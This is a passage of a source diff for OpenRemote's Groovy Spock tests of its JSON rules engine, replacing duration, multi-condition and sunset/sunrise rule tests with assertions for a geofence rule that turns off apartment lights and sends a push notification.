-        def lightId = UniqueIdentifierGenerator.generateId("TestLight")
-        def lightAsset = new LightAsset("TestLight")
-                .setId(lightId)
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-                .setLocation(new GeoJSONPoint(0, 0))
-
-
-        def ruleState = new MetaItem<>(MetaItemType.RULE_STATE)
-        lightAsset.getAttributes().get("brightness").get().addMeta(ruleState)
-        lightAsset.getAttributes().get("onOff").get().addMeta(ruleState)
-        lightAsset.getAttributes().get("notes").get().addMeta(ruleState)
-        assetStorageService.merge(lightAsset)
-
-        then: "the light asset should be present"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light != null
-        }
-
-        when: "a thing asset is added to the building realm"
-        def thingId = UniqueIdentifierGenerator.generateId("TestThing")
-        def thingAsset = new ThingAsset("TestThing")
-                .setId(thingId)
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-                .setLocation(new GeoJSONPoint(0, 0))
-        thingAsset.getAttributes().get("notes").get().addMeta(ruleState)
-        thingAsset = assetStorageService.merge(thingAsset)
-
-        then: "the thing asset should be present"
-        conditions.eventually {
-            def thing = assetStorageService.find(thingId)
-            assert thing != null
-        }
-
-        // RuleSet: WHEN:
-        // Any light asset has brightness higher than 50 for 5 minutes and onOff is true
-        // AND
-        // Any thing asset has notes set to "Test"
-        // OR
-        // Any light asset has a note that equals "TriggerDuration" for 10 minutes
-        // THEN:
-        // Set the notes of the light asset to "Triggered"
-
-        when: "a ruleset with a duration map has been added"
-        def rulesStr = getClass().getResource("/org/openremote/test/rules/JsonAttributeDurationRule.json").text
-        def rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
-        Ruleset ruleset = new RealmRuleset(
-                keycloakTestSetup.realmBuilding.name,
-                "Duration Rule",
-                Ruleset.Lang.JSON,
-                rulesStr)
-        ruleset = rulesetStorageService.merge(ruleset)
-        def lastFireTimestamp = 0
-
-        then: "the rule engines to become available and be running with asset states inserted"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 4 // 4 additional rule states
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "the light asset is updated with brightness set to 100"
-        lightAsset = assetStorageService.find(lightId)
-        lightAsset.getAttribute("brightness").get().setValue(100)
-        assetStorageService.merge(lightAsset)
-
-        then: "the brightness value should be 100"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
-        }
-
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should still have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "the thing asset is updated with notes set to Test"
-        thingAsset = assetStorageService.find(thingId)
-        thingAsset.getAttribute("notes").get().setValue("Test")
-        assetStorageService.merge(thingAsset)
-
-        then: "the thing asset should have its notes set to Test"
-        conditions.eventually {
-            def thing = assetStorageService.find(thingId)
-            assert thing.getAttribute("notes").get().getValue().orElse("") == "Test"
-        }
-
-        when: "time advances by 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should still have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 5 minutes"
-        advancePseudoClock(5, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be empty" // because onOff is still false
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "the light asset is updated with onOff set to true"
-        lightAsset = assetStorageService.find(lightId)
-        lightAsset.getAttribute("onOff").get().setValue(true)
-        assetStorageService.merge(lightAsset)
-
-        then: "the light asset should have its onOff attribute set to true"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("onOff").get().getValue().orElse(false) == true
-        }
-
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute set to Triggered" // because onOff was set to true, and brightness was above 50 for 5 minutes and the thing asset notes was set to Test
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == "Triggered"
-        }
-
-        when: "the light asset notes is updated to empty"
-        lightAsset = assetStorageService.find(lightId)
-        lightAsset.getAttribute("notes").get().setValue("")
-        assetStorageService.merge(lightAsset)
-
-        then: "the light asset should have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 10 minutes"
-        advancePseudoClock(10, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-
-        when: "the light asset notes is updated to TriggerDuration"
-        lightAsset = assetStorageService.find(lightId)
-        lightAsset.getAttribute("notes").get().setValue("TriggerDuration")
-        assetStorageService.merge(lightAsset)
-
-        then: "the light asset should have its notes attribute be TriggerDuration"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == "TriggerDuration"
-        }
-
-
-        // Start OR condition part
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be TriggerDuration"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == "TriggerDuration"
-        }
-
-        when: "time advances for 10 minutes"
-        advancePseudoClock(10, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be Triggered" // because the OR condition was satisfied (thing asset notes was set to Test for 10 minutes)
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == "Triggered"
-        }
-
-        when: "the light asset notes and brightness are updated and thing asset notes is updated to empty"
-        lightAsset = assetStorageService.find(lightId)
-        lightAsset.getAttribute("notes").get().setValue("")
-        lightAsset.getAttribute("brightness").get().setValue(0)
-        thingAsset = assetStorageService.find(thingId)
-        thingAsset.getAttribute("notes").get().setValue("")
-        assetStorageService.merge(lightAsset)
-        assetStorageService.merge(thingAsset)
-
-        then: "the light asset should have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-            assert light.getAttribute("brightness").get().getValue().orElse(0) == 0
-            def thing = assetStorageService.find(thingId)
-            assert thing.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 1 minute"
-        advancePseudoClock(1, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes empty abd brightness set to 0 and thing asset notes set to empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-            assert light.getAttribute("brightness").get().getValue().orElse(0) == 0
-            def thing = assetStorageService.find(thingId)
-            assert thing.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired and"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "light asset brightness is updated to 100 and thing asset notes is updated to Test"
-        lightAsset = assetStorageService.find(lightId)
-        lightAsset.getAttribute("brightness").get().setValue(100)
-        thingAsset = assetStorageService.find(thingId)
-        thingAsset.getAttribute("notes").get().setValue("Test")
-        assetStorageService.merge(lightAsset)
-        assetStorageService.merge(thingAsset)
-
-        then: "the light asset should have its brightness set to 100"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
-            def thing = assetStorageService.find(thingId)
-            assert thing.getAttribute("notes").get().getValue().orElse("") == "Test"
-        }
-
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 3 minutes"
-        advancePseudoClock(3, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "brightness is updated to 0"
-        lightAsset = assetStorageService.find(lightId)
-        lightAsset.getAttribute("brightness").get().setValue(0)
-        assetStorageService.merge(lightAsset)
-
-        then: "the light asset should have its brightness set to 0" // this is done to reset the duration of the matched state
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("brightness").get().getValue().orElse(0) == 0
-        }
-
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "brightness is updated to 100"
-        lightAsset = assetStorageService.find(lightId)
-        lightAsset.getAttribute("brightness").get().setValue(100)
-        assetStorageService.merge(lightAsset)
-
-        then: "the light asset should have its brightness set to 100" // set to 100 to start the duration of the matched state
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("brightness").get().getValue().orElse(0) == 100
-        }
-
-        when: "time advances for 6 seconds"
-        advancePseudoClock(6, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 4 minutes"
-        advancePseudoClock(3, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be empty" // because brightness was set to 0 in between so the timer was reset for that attribute match
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "time advances for 3 minutes"
-        advancePseudoClock(3, TimeUnit.MINUTES, container)
-
-        then: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be Triggered" // because brightness has been above 50 for 5 minutes.
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == "Triggered"
-        }
+    when: "the console device moves outside the home geofence (as defined in the rule)"
+    def outsideLocation = new GeoJSONPoint(0d, 0d)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(consoleRegistration.id, Asset.LOCATION.name, outsideLocation))
+
+    then: "the apartment lights should be switched off"
+    conditions.eventually {
+      def livingroomAsset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
+      assert !livingroomAsset.getAttribute("lightSwitch").get().value.get()
+      assert livingroomAsset.getAttribute("lightSwitchTriggerTimes").flatMap{
+        it.value
+      }.map{
+        it.length
+      }.orElse(0) == 2
+      assert livingroomAsset.getAttribute("plantsWaterLevels").get().getValue(Map.class).get().get("cactus") == 0.8
+      def bathRoomAsset = assetStorageService.find(managerTestSetup.apartment2BathroomId, true)
+      assert !bathRoomAsset.getAttribute("lightSwitch").get().value.get()
     }
 
-    def "Trigger actions based on multiple LHS conditions"() {
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def timerService = container.getService(TimerService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        RulesEngine realmBuildingEngine
-
-        and: "the pseudo clock is stopped"
-        stopPseudoClock()
-
-        when: "a light asset is added to the building realm"
-        def lightId = UniqueIdentifierGenerator.generateId("Light")
-        def lightAsset = new LightAsset("Light")
-                .setId(lightId)
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-                .setLocation(new GeoJSONPoint(0, 0))
-
-
-        def ruleState = new MetaItem<>(MetaItemType.RULE_STATE)
-        lightAsset.getAttributes().get("brightness").get().addMeta(ruleState)
-        lightAsset.getAttributes().get("onOff").get().addMeta(ruleState)
-        assetStorageService.merge(lightAsset)
-
-        then: "the light asset should be present"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light != null
-        }
-
-        // RuleSet: WHEN:
-        // Any light asset has brightness greater than 50
-        // AND
-        // Any light asset has onOff set to true
-        // THEN:
-        // Set the notes of the light asset to "Matched"
-        when: "a ruleset with multiple LHS conditions has been added"
-        def rulesStr = getClass().getResource("/org/openremote/test/rules/JsonMultipleLHSConditionsRule.json").text
-        def rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
-        Ruleset ruleset = new RealmRuleset(
-                keycloakTestSetup.realmBuilding.name,
-                "Multi LHS Rule",
-                Ruleset.Lang.JSON,
-                rulesStr)
-        ruleset = rulesetStorageService.merge(ruleset)
-        def lastFireTimestamp = 0
-
-        then: "the rule engines to become available and be running with asset states inserted"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING + 2 // 2 additional rule states
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the light asset should have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        when: "the light asset brightness is updated to 100 and onOff is updated to true and time advances for 3 seconds"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 100))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.ON_OFF, true))
-
-        // advance time to 3 seconds to ensure the rule engine has fired
-        advancePseudoClock(3, TimeUnit.SECONDS, container)
-
-        then: "the light asset should have its notes attribute be Matched because the LHS conditions were satisfied"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == "Matched"
-        }
-
-        and: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "notes is updated to empty and time advances for 3 seconds"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.NOTES, ""))
-
-        // advance time to 3 seconds to ensure the rule engine has fired
-        advancePseudoClock(3, TimeUnit.SECONDS, container)
-
-        then: "the light asset should have its notes attribute be empty"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        and: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "brightness is updated to 10, thus not satisfying the LHS conditions and time advances for 3 seconds"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 10))
-
-        // advance time to 3 seconds to ensure the rule engine has fired
-        advancePseudoClock(3, TimeUnit.SECONDS, container)
-
-        then: "the light asset should have its notes attribute be empty because the LHS conditions were not satisfied"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == ""
-        }
-
-        and: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "brightness is updated to 100, thus satisfying the LHS conditions and time advances for 3 seconds"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(lightId, LightAsset.BRIGHTNESS, 100))
-
-        // advance time to 3 seconds to ensure the rule engine has fired
-        advancePseudoClock(3, TimeUnit.SECONDS, container)
-
-        then: "the light asset should have its notes attribute be set to Matched because the LHS conditions were satisfied"
-        conditions.eventually {
-            def light = assetStorageService.find(lightId)
-            assert light.getAttribute("notes").get().getValue().orElse("") == "Matched"
-        }
-
-        and: "the rule engine should have fired"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
+    and: "a push notification should have been sent to the console via the asset target with the title 'Test title'"
+    conditions.eventually {
+      assert pushTargetsAndMessages.count {
+        it.v2.title == "Test title" && it.v1.type == Notification.TargetType.ASSET && it.v1.id == consoleRegistration.id
+      } == 1
     }
 
-    def "Trigger actions based on the position of the sun"() {
-
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def pushNotificationHandler = container.getService(PushNotificationHandler.class)
-        def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
-        def notificationService = container.getService(NotificationService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def timerService = container.getService(TimerService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        RulesEngine realmBuildingEngine
-
-        and: "a thing asset is added to the building realm"
-        def thingId = UniqueIdentifierGenerator.generateId("TestThing")
-        def thingAsset = new ThingAsset("TestThing")
-                .setId(thingId)
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-                .setLocation(new GeoJSONPoint(0, 0))
-                .addAttributes(
-                        new Attribute<>("sunset", ValueType.INTEGER, null),
-                        new Attribute<>("sunriseWithOffset", ValueType.INTEGER, null),
-                        new Attribute<>("twilightHorizon", ValueType.INTEGER, null),
-                )
-        thingAsset = assetStorageService.merge(thingAsset)
-
-        and: "the pseudo clock is stopped"
-        stopPseudoClock()
-
-        when: "a ruleset with sunset trigger condition is added whose action updates the thing asset"
-        def rulesStr = getClass().getResource("/org/openremote/test/rules/JsonRuleSunset.json").text
-        def rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
-        Ruleset ruleset = new RealmRuleset(
-                keycloakTestSetup.realmBuilding.name,
-                "Sunset Rule",
-                Ruleset.Lang.JSON,
-                rulesStr)
-        ruleset = rulesetStorageService.merge(ruleset)
-        def sunsetCalculator = JsonRulesBuilder.getSunCalculator(ruleset, rule.rules[0].when.groups[0].items[0].sun, timerService)
-        def sunTimes = sunsetCalculator.execute()
-        def lastFireTimestamp = 0
-
-        then: "the rule engines to become available and be running with asset states inserted"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-            assert sunsetCalculator != null
-        }
-
-        and: "the next sunset should be calculated and should be in the future"
-        assert sunTimes.getSet() != null
-        assert sunTimes.getSet().toInstant().isAfter(timerService.getNow())
-
-        and: "the rule should not have triggered"
-        conditions.eventually {
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 0
-        }
-
-        when: "time advances slightly"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired again and the rule should not have triggered"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 0
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "time advances slightly past the next sunset time and the rule engine fires"
-        advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getSet()).getSeconds()+1, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired again and the rule should have triggered"
-        def lastUpdateTime = 0
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 100
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-            lastUpdateTime = thingAsset.getAttribute("sunset").get().getTimestamp().orElse(0)
-        }
-
-        when: "time advances slightly"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired again and the rule should not have triggered"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp >= lastFireTimestamp + 1000
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunset").get().getTimestamp().orElse(-1) == lastUpdateTime
-        }
-
-        when: "time advances past the sunset"
-        sunTimes = sunsetCalculator.on(sunTimes.getSet().plusHours(1)).execute()
-        advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getRise()).getSeconds(), TimeUnit.SECONDS, container)
-
-        and: "the updated attribute is cleared"
-        thingAsset.getAttribute("sunset").get().setValue(null)
-        thingAsset = assetStorageService.merge(thingAsset)
-
-        then: "the rule engine should have fired again and the rule should not have triggered"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 0
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "time advances slightly past the next sunset time and the rule engine fires"
-        sunTimes = sunsetCalculator.on(sunTimes.getSet().plusHours(1)).execute()
-        advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getSet().plusSeconds(10)).getSeconds()+1, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired again and the rule should have triggered"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 100
-        }
-
-        when: "a schedule is added to the rule to enable it 2 hours after sunset each day"
-        ruleset.setValidity(new CalendarEvent(sunTimes.getSet().plusHours(2).toDate(), sunTimes.getSet().plusHours(12).toDate(), new Recur<>(Frequency.DAILY, 5)))
-        ruleset = rulesetStorageService.merge(ruleset)
-
-        then: "the rule should become paused in the engine"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.get(ruleset.id).status == PAUSED
-        }
-
-        when: "the updated attribute is cleared"
-        thingAsset.getAttribute("sunset").get().setValue(null)
-        thingAsset = assetStorageService.merge(thingAsset)
-
-        and: "time advances into the next active time of the rule"
-        sunTimes = sunsetCalculator.on(sunTimes.getSet().plusHours(1)).execute()
-        advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getSet().plusHours(4)).getSeconds(), TimeUnit.SECONDS, container)
-
-        then: "the rule should become un-paused in the engine"
-        conditions.eventually {
-            assert realmBuildingEngine.deployments.get(ruleset.id).status == DEPLOYED
-        }
-
-        then: "the rule engine should have fired again and the rule should not have triggered (as past sunset)"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunset").get().getValue().orElse(0) == 0
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "a ruleset with sunrise offset trigger condition is added whose action updates the thing asset"
-        rulesStr = getClass().getResource("/org/openremote/test/rules/JsonRuleSunriseOffset.json").text
-        rule = parse(rulesStr, JsonRulesetDefinition.class).orElseThrow()
-        ruleset = new RealmRuleset(
-                keycloakTestSetup.realmBuilding.name,
-                "Sunrise with offset Rule",
-                Ruleset.Lang.JSON,
-                rulesStr)
-        ruleset = rulesetStorageService.merge(ruleset)
-        sunsetCalculator = JsonRulesBuilder.getSunCalculator(ruleset, rule.rules[0].when.groups[0].items[0].sun, timerService)
-        sunTimes = sunsetCalculator.execute()
-
-        then: "the rule engines to become available and be running with asset states inserted"
-        conditions.eventually {
-            realmBuildingEngine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert realmBuildingEngine != null
-            assert realmBuildingEngine.isRunning()
-            assert realmBuildingEngine.facts.assetStates.size() == DEMO_RULE_STATES_SMART_BUILDING
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        and: "the next sunrise should be calculated and should be in the future"
-        assert sunTimes.getRise() != null
-        assert sunTimes.getRise().toInstant().isAfter(timerService.getNow())
-
-        and: "the rule should not have triggered"
-        conditions.eventually {
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunriseWithOffset").get().getValue().orElse(0) == 0
-        }
-
-        when: "time advances slightly past the next sunrise time and the rule engine fires"
-        advancePseudoClock(Duration.between(timerService.getNow(), sunTimes.getRise()).getSeconds()+1, TimeUnit.SECONDS, container)
-
-        then: "the rule engine should have fired again and the rule should not have triggered"
-        conditions.eventually {
-            assert realmBuildingEngine.lastFireTimestamp > lastFireTimestamp
-            assert realmBuildingEngine.lastFireTimestamp == timerService.getNow().toEpochMilli()
-            thingAsset = assetStorageService.find(thingId) as ThingAsset
-            assert thingAsset.getAttribute("sunriseWithOffset").get().getValue().orElse(0) == 0
-            lastFireTimestamp = realmBuildingEngine.lastFireTimestamp
-        }
-
-        when: "time advances past the offset delay and the rule engine fires"
